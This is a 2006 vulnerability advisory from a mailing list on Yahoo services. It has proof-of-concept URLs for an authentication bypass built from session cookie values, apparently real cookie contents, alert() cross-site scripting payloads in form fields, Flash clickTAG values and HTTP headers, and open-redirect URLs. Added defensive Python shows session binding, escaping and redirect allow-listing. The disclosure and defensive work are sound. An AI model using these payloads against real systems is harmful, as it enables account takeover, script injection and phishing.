Yahoo Multiple Vulnerabilities (Authentication Bypass, Session Binding, Cookie
Encoding Security Weakness, Cross-Site Scripting and URL Redirection)

############################################################################

XDisclose Advisory      : XD100001
Advisory Released       : 20th June 06
Credit                  : Rajesh Sethumadhavan

Class                   : Authentication Bypass
                          Session Binding Vulnerability
                          Cookies Encoding Security Weakness
                          Cross-Site Scripting
                          URL redirection
Severity                : Medium
Solution Status         : Unpatched
Vendor                  : Yahoo
Affected applications   : Yahoo multiple web-based services

############################################################################


Overview:
Yahoo! Inc. is an American computer services company with a mission to
"be the most essential global Internet service for consumers and
businesses". It operates an Internet portal, including the popular
Yahoo! Mail. According to Web trends, Yahoo! is the most visited
website on the Internet today, with more than 400 million unique users.
The global network of Yahoo! websites received 3.4 billion page views
per day on average as of October 2005.

Various Yahoo! services are vulnerable to authentication bypass,
session binding, weak cookie encoding, cross-site scripting, file
inclusion and URL redirection vulnerabilities, which are caused by
improper validation of user-supplied input.

Description:
Multiple vulnerabilities exist in various Yahoo services.
 

1. Authentication Bypass and Session Binding Vulnerability.
   A malicious user can log on to Yahoo without submitting a
   username and password by constructing a malicious URL from
   cookie values.

   The same session (URL) can be used to log in multiple times from
   multiple IP addresses, leading to a session binding vulnerability.

   POC: (UPDATED in Original Site)
  
--------------------------------------------------------------------------
  
http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11
%26l=i42.j4ij/o&.t=T=sk=DAA07q67uzjeFv%26d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0
BYQFRQUUBdGlwAVNQZHhvQgF6egFYdzhuRUJnV0E-&.done=http%3a//mail.yahoo.com
  
--------------------------------------------------------------------------
  
http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11
%26l=i42.j4ij/o%26p=m2gvvind13000700&.t=T=sk=DAA07q67uzjeFv%26d=c2wBTlRVMU
FUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFYdzhuRUJnV0E-&.done=http
%3a//mail.yahoo.com
  
--------------------------------------------------------------------------

   Here "sk" and "d" are the session values.

   Screenshot:
   http://www.xdisclose.com/Yahoo_Auth_Bypass.png


2. Cookie Encoding Security Weakness
   The cookie implementation in Yahoo is so weak that the cookies can
   be decoded easily. A malicious attacker can easily collect personal
   information from the cookies, such as year of birth, zip code,
   country and name, which can then be used to obtain the password
   through "Yahoo forgot password".

   Field meanings:
   sk & d  - session
   n       - password
   l       - username
   p       - country, year of birth, gender and more
   b       - cookies created
   lg      - language
   intl    - international language
   iz      - zipcode
   jb      - industry and title

   POC Screenshot:
   http://www.xdisclose.com/Yahoo_Cookie_Encoding.png
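The following is an added illustration for sections 1 and 2, not code from the advisory or from Yahoo. It parses a Cookie header laid out the way the advisory shows (named cookies separated by ';', each carrying '&'-separated subfields such as sk, d, n, l, iz) and lists which subfields carry the credential or profile data the advisory names; the sample header and all its values are constructed placeholders. It then shows the contrasting server-side pattern a defender would want: an opaque random session id with the profile kept on the server, HMAC-bound to a client attribute (the binding string, e.g. source address, is an assumption) so that a copied value presented from a different binding is rejected. SERVER_KEY and SESSION_STORE are in-memory stand-ins for a secret store and a session database.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qsl

# Constructed sample Cookie header in the layout the advisory describes:
# named cookies separated by ';', each carrying '&'-separated subfields.
# All values are placeholders, not real tokens.
SAMPLE_COOKIE_HEADER = (
    "B=bucketid&b=3&s=j3; "
    "Y=v=1&n=secretvalue&l=exampleuser&p=profileblob&jb=19|24|&iz=123456; "
    "T=sk=sessionkey&d=sessiondata"
)

# Subfield meanings as listed in section 2 of the advisory.
FIELD_MEANING = {
    "sk": "session", "d": "session", "n": "password", "l": "username",
    "p": "country, year of birth, gender and more", "b": "cookies created",
    "lg": "language", "intl": "international language", "iz": "zipcode",
    "jb": "industry and title",
}


def parse_cookie_header(header):
    """Split a Cookie header into {cookie_name: {subfield: value}}."""
    cookies = {}
    for part in header.split(";"):
        part = part.strip()
        if "=" not in part:
            continue
        name, _, body = part.partition("=")
        # Subfields use query-string syntax, so parse_qsl handles '&' and %XX.
        cookies[name] = dict(parse_qsl(body, keep_blank_values=True))
    return cookies


def exposed_fields(cookies):
    """Return (cookie, subfield, meaning) for every plaintext subfield that
    the advisory identifies as credential or profile data. Anyone who can
    read the cookie (proxy logs, a leaked URL, a shared machine) reads these."""
    return [
        (cname, key, FIELD_MEANING[key])
        for cname, fields in cookies.items()
        for key in fields
        if key in FIELD_MEANING
    ]


# Hardened pattern (an illustration added here, not Yahoo's design): keep the
# profile server-side, give the client a random opaque id, and bind that id to
# a client attribute with an HMAC so a copied value presented from a different
# binding is rejected.
SERVER_KEY = secrets.token_bytes(32)  # assumed to come from a secret store in practice
SESSION_STORE = {}  # opaque id -> {"profile": ..., "binding": ...}


def _tag(sid, client_binding):
    msg = f"{sid}|{client_binding}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_session(profile, client_binding):
    """Create a session and return the cookie value 'id.tag'."""
    sid = secrets.token_urlsafe(24)
    SESSION_STORE[sid] = {"profile": profile, "binding": client_binding}
    return f"{sid}.{_tag(sid, client_binding)}"


def validate_session(cookie_value, client_binding):
    """Return the stored profile if the tag and binding check out, else None."""
    sid, _, tag = cookie_value.partition(".")
    if not hmac.compare_digest(tag.encode(), _tag(sid, client_binding).encode()):
        return None
    record = SESSION_STORE.get(sid)
    if record is None or record["binding"] != client_binding:
        return None
    return record["profile"]
```

The point of the contrast: with the first layout, the cookie itself is the record, so anything that captures it (or a URL that carries it, as in section 1) is usable anywhere; with the second, the cookie is a lookup key whose validity depends on a server-held secret and on the client attribute it was bound to. Binding to the source address, which is what the advisory's multi-IP concern suggests, breaks legitimate users behind changing addresses, so deployments usually bind to something more stable or pair it with short lifetimes and re-authentication for sensitive actions.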

3. Cross-Site Scripting.
   These vulnerabilities result from the failure of the Yahoo! filtering
   engine to block certain user-supplied inputs.

   a) Yahoo Calendar Service XSS
        The flaws are due to improper sanitization of inputs passed to
        "Location", "Address", "Street" and "Phone".

        =================================================================
        This event repeats every day.
        </font><br>
        <font face="Arial" size=-1>
        <b>Event Location</b>: <script>alert('Location')</script>
        <br><b>Street</b>: <script>alert('Address')</script>
        <br><b>City, State, Zip</b>: <script>alert('Street')</script>
        <br><b>Phone</b>: <script>alert('Phone')</script>
        </font><br>                            
        =================================================================
        
        Screenshot:
        http://www.xdisclose.com/XSS_Calender_Address.png
        http://www.xdisclose.com/XSS_Calender_Phone.png
        http://www.xdisclose.com/XSS_Calender_location.png
        http://www.xdisclose.com/XSS_Calender_Street.png


   b) Yahoo Options Mail Account XSS
        The flaws are due to improper sanitization of inputs passed to
        "Name" and "Reply to" parameters.


        =================================================================
        <tr valign="top">
        <td>Name:</td>
        <td><script>alert('Name')</script></td>
        </tr>

        <tr valign="top">
        <td>Email:</td>
        <td>[EMAIL PROTECTED]</td>
        </tr>   
        <tr valign="top">
        <td>Reply-To:</td>      
        <td><script>alert('Reply')</script>@yah.com</td>
        </tr>
        =================================================================

        Screenshot:
        http://www.xdisclose.com/XSS_Mail_Account_Name.png
        http://www.xdisclose.com/XSS_Mail_Account_Reply.png


   c) Yahoo Options Filter XSS.
        The flaws are due to improper sanitization of inputs passed to
        the "From" and "To" parameters.
        =================================================================
        <b>From</b>     contains
        "<b><script>alert('From')</script>@yahoo.com</b>"
        <br>
        &nbsp;&nbsp;&nbsp;<b>To/CC</b> contains
        "<b><script>alert('To')</script>@yahoo.com</b>"
        <br>
        =================================================================

        Screenshot:
        http://www.xdisclose.com/Xss_Filter_From.png
        http://www.xdisclose.com/Xss_Filter_To.png


   d) Yahoo Ads Flash file XSS.
        The flaws are due to improper sanitization of the clickTAG input
        passed to Flash ad files.

        Exploit:
        -----------------------------------------------------------------

        http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
        20060330_68006_1_425x600_monster_morph_asker_1_check.swf?
        clickTAG=javascript:alert('XSS%20Possiable%20in%20
        Yahoo%20Ads%20\n%20By%20Rajesh')

        http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
        042406_68946_v1_728x90_super_nup_fun.swf?clickTAG=
        javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads
        %20\n%20By%20Rajesh')

        http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
        042406_68946_v1_425x600_mon_nup_mplace.swf?clickTAG=
        javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads
        %20\n%20By%20Rajesh')

        http://ad.ie.doubleclick.net/812666/specsavers_2
        for1euro_300x250.swf?clickTAG=javascript:
        alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20
        By%20Rajesh')

        http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
        042406_68946_v1_728x90_super_nup_sit.swf?clickTAG=
        javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads
        %20\n%20By%20Rajesh')

        http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_messenger/
        20051028_61760_2_425x600_mon_scarehim.swf?clickTAG=
        javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads
        %20\n%20By%20Rajesh')

        http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_mail/
        20060512_65459_1_360x100_mwa1_mail_accolades.swf?
        clickTAG=javascript:alert('XSS%20Possiable%20in%20
        Yahoo%20Ads%20\n%20By%20Rajesh')

        and more
        -----------------------------------------------------------------

        Screenshot:
        http://www.xdisclose.com/XSS_Flash_Ads.png


   e) Yahoo Mail Beta HTTP Header XSS
        The flaws are due to improper sanitization of inputs passed in
        all HTTP headers, such as Accept, Accept-Charset, Accept-Language,
        Cache-Control, Connection, Content-Length, Content-Type,
        Cookie, Keep-Alive, Pragma, SOAPAction and User-Agent, in
        Yahoo Mail Beta.

        POC :
        =================================================================
        GET : 
        http://uk.f555.mail.yahoo.com/ymws?m=ListFolders&wssid=
        CKyO7/zcUU2

        "Host: uk.f555.mail.yahoo.com
        User-Agent: <script>alert('User-Agent:')</script>
        Accept: text/xml,application/xml,application/xhtml+xml,text/
        html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;<script>
        alert('Accept:')</script>
        Accept-Language: en-us,en;q=0.5;<script>alert('Accept-
        Language:')</script>
        Accept-Encoding: gzip,deflate;<script>alert('Accept-
        Encoding:')</script>
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;<script>alert
        ('Accept-Charset:')</script>
        Keep-Alive: 300;<script>alert('Keep-Alive:')</script>
        Connection: keep-alive;<script>alert('Connection:')</script>
        SOAPAction: urn:yahoo:ymws#ListFolders;<script>alert
        ('SOAPAction:')</script>
        Content-Length: <script>alert('Content-Length:')</script>
        Content-Type: application/xml;<script>alert('Content-
        Type:')</script>
        Cookie: B=dcnl4j129c7tu&b=3&s=j3; 
        F=a=aNqy1CosvW3BmaGno6BSLOpXkP2PCglCZ3_LDJtts8oaitn
        kGkgOOjxwPKS6&b=bIpq;Y=v=1&n=0kvgvgv3qlf11&l=i42.j4ij/o&
        p=m2gvvind12000700&jb=19|24|&iz=123456
        r=g4&lg=uk&intl=uk&np=1;PH=fn=eIhKKoq4dTG7Gjr4FtHqCTA-;
        T=z=W/hlEBWF3lEBrRcLnJGLZKoMjIyBjUyNjU2NE9OMzI-&
        a=QAE&sk=DAAZ7oQuYalSuV&d=c2wBTlRVMUFUSTF
        NVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFXL2hsRUJnV0E-;
        U=mt=7lM5FJ2MhYo0WJ.pqDZdpFIY1pCQZRq2Q6ftdw--&ux=W/hlEB
        &un=0kvgvgv3qlf11;YM.dpref1=sec.test%3Aspp%257C1;<script>alert
        ('Cookie:')</script>
        Pragma: no-cache;<script>alert('Pragma:')</script>
        Cache-Control: no-cache;<script>alert('Cache-Control:')
        </script>"
        =================================================================

        Screenshot:
        http://www.xdisclose.com/XSS_MailBeta_Accept.png
        http://www.xdisclose.com/XSS_MailBeta_Accept-Charset.png
        http://www.xdisclose.com/XSS_MailBeta_Accept-Language.png
        http://www.xdisclose.com/XSS_MailBeta_Cache-Control.png
        http://www.xdisclose.com/XSS_MailBeta_Connection.png
        http://www.xdisclose.com/XSS_MailBeta_Content-Length.png
        http://www.xdisclose.com/XSS_MailBeta_Content-Type.png
        http://www.xdisclose.com/XSS_MailBeta_Cookie.png
        http://www.xdisclose.com/XSS_MailBeta_Keep-Alive.png
        http://www.xdisclose.com/XSS_MailBeta_Pragma.png
        http://www.xdisclose.com/XSS_MailBeta_SoapAction.png
        http://www.xdisclose.com/XSS_MailBeta_User-Agent.png


        Impact:
        Successful exploitation allows execution of arbitrary script
        code in a user's browser session in the context of the affected
        site, which may allow an attacker to steal cookie-based
        authentication credentials.
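Added example for the cross-site scripting items above; it is not code from the advisory or from Yahoo. Cases a, b, c and e all reflect a user-controlled string into an HTML body context (calendar fields, account name, filter rule, request headers), and the fix is the same for each: escape at output time for that context. Case d is different, because clickTAG is consumed as a URL, so escaping does nothing and the value must instead be restricted to http(s) URLs with a host. The sample fields are constructed from the advisory's test strings; FALLBACK_TARGET, the landing page used when a clickTAG is rejected, is an assumed placeholder.

```python
import html
from urllib.parse import urlsplit

# Constructed sample inputs modelled on the advisory's test strings.
CALENDAR_FIELDS = {
    "Location": "<script>alert('Location')</script>",
    "Street": "123 Main St",
    "Phone": "<script>alert('Phone')</script>",
}

# Placeholder landing page used when an ad's clickTAG is rejected (assumed).
FALLBACK_TARGET = "https://example.com/"
ALLOWED_CLICK_SCHEMES = {"http", "https"}


def render_event(fields):
    """Render the calendar event block with every user-supplied value escaped
    for the HTML body context, which is where the advisory's payloads landed."""
    rows = [
        f"<b>{html.escape(label)}</b>: {html.escape(value, quote=True)}"
        for label, value in fields.items()
    ]
    return "<br>".join(rows)


def has_active_markup(rendered):
    """Regression check on rendered output: after removing the template's own
    tags, no '<' may remain, because any that does came from a user value."""
    stripped = rendered
    for tag in ("<b>", "</b>", "<br>"):
        stripped = stripped.replace(tag, "")
    return "<" in stripped


def safe_click_target(click_tag):
    """Accept a clickTAG only if it is an absolute http(s) URL with a host.
    A javascript: value (or any other scheme, or a scheme-relative //host)
    is replaced by the fallback. The same rule belongs inside the SWF where
    clickTAG is passed to getURL; this is the ad-serving side of it."""
    candidate = click_tag.strip()
    parts = urlsplit(candidate)
    if parts.scheme.lower() in ALLOWED_CLICK_SCHEMES and parts.netloc:
        return candidate
    return FALLBACK_TARGET
```

Two details worth noting: html.escape with quote=True also encodes single quotes, so the same helper is safe when a value ends up inside a quoted attribute; and the clickTAG check tests the parsed scheme and host rather than looking for the substring "javascript", so mixed case and leading whitespace do not slip through.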
  
4. URL redirection.
   This is due to a failure to filter incoming untrusted data before
   the content reaches users. It can be exploited for phishing
   attacks. The vulnerable parameters are in Yahoo search web, image,
   video, preferences, cache, Yahoo Answers and more URLs containing
   /*http://yahoo.com or /**http://yahoo.com

   Exploit:
  
---------------------------------------------------------------------------
   http://rds.yahoo.com/_ylt=Ah0geusyaM2xEzqMAjS9XNyoA/SIG=11do5qdq6/
   EXP=1148028186/**http%3a//www.xdisclose.com

   http://search.yahoo.com/preferences/preferences?pref_done=
   http%3a//www.xdisclose.com
  
---------------------------------------------------------------------------

   Screenshot:
   http://www.xdisclose.com/URL_Redirection_WebSearch.png
   http://www.xdisclose.com/URL_Redirection_Images.png
   http://www.xdisclose.com/URL_Redirection_Video.png
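Added example for the URL redirection item, not code from the advisory or from Yahoo. It shows the check a redirector such as the rds or preferences endpoints would need: undo one level of percent-encoding, strip the "/*" or "/**" wrapper the advisory mentions, and then allow only a same-site relative path or an http(s) URL whose host exactly matches an allow-list. ALLOWED_HOSTS and SAFE_DEFAULT are assumed deployment placeholders.

```python
from urllib.parse import unquote, urlsplit

# Assumed deployment values (placeholders): the host that serves the
# redirector and the other hosts it may legitimately send users to.
ALLOWED_HOSTS = {"search.example.com", "mail.example.com"}
ALLOWED_SCHEMES = {"http", "https"}
SAFE_DEFAULT = "/"


def extract_target(raw):
    """Undo one level of percent-encoding and strip the '/*' or '/**' wrapper
    the advisory describes, so the embedded absolute URL is what gets judged."""
    decoded = unquote(raw).strip()
    body = decoded.lstrip("/")
    if body.startswith("*"):
        return body.lstrip("*")
    return decoded


def is_allowed_target(raw):
    """True only for a same-site relative path or an http(s) URL whose host is
    exactly on the allow-list. Suffix tricks (mail.example.com.evil.test) and
    scheme-relative //host forms fail the exact-match test."""
    target = extract_target(raw)
    try:
        parts = urlsplit(target)
    except ValueError:  # e.g. malformed IPv6 literal
        return False
    if not parts.scheme and not parts.netloc:
        # Relative path: must be absolute-path form and must not start with '//'.
        return target.startswith("/") and not target.startswith("//")
    return parts.scheme in ALLOWED_SCHEMES and parts.hostname in ALLOWED_HOSTS


def safe_redirect_target(raw):
    """Return the value a Location: header may carry for this parameter."""
    return extract_target(raw) if is_allowed_target(raw) else SAFE_DEFAULT
```

The decision is made on the parsed host, not on whether the string contains "yahoo.com" somewhere, which is what a prefix or substring check would do and what the "/**http://..." pattern defeats. Only one level of percent-decoding is applied on purpose: decoding repeatedly reintroduces the ambiguity between what this code judges and what the browser will eventually request.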

5. Interesting facts about Yahoo
   Yahoo Mail Inbox shows a wrong unread message count if there are more
   than 65535 unread messages.
 
   Screenshot:
   http://www.xdisclose.com/Yahoo_Inbox.png
  
Original Advisory:
http://www.xdisclose.com/XD100001.txt

Credits:
Rajesh Sethumadhavan has been credited with the discovery of these
vulnerabilities.


Disclaimer:
This entire document is strictly for educational, testing and
demonstration purposes only. Modification, use and/or publishing of this
information is entirely at your own risk. The exploit code is to be
used on your own email account. I am not liable for any direct or
indirect damages caused as a result of using the information or
demonstrations provided in any part of this advisory.
_______________________________________________
darklab mailing list
[email protected]
http://lists.darklab.org/cgi-bin/mailman/listinfo/darklab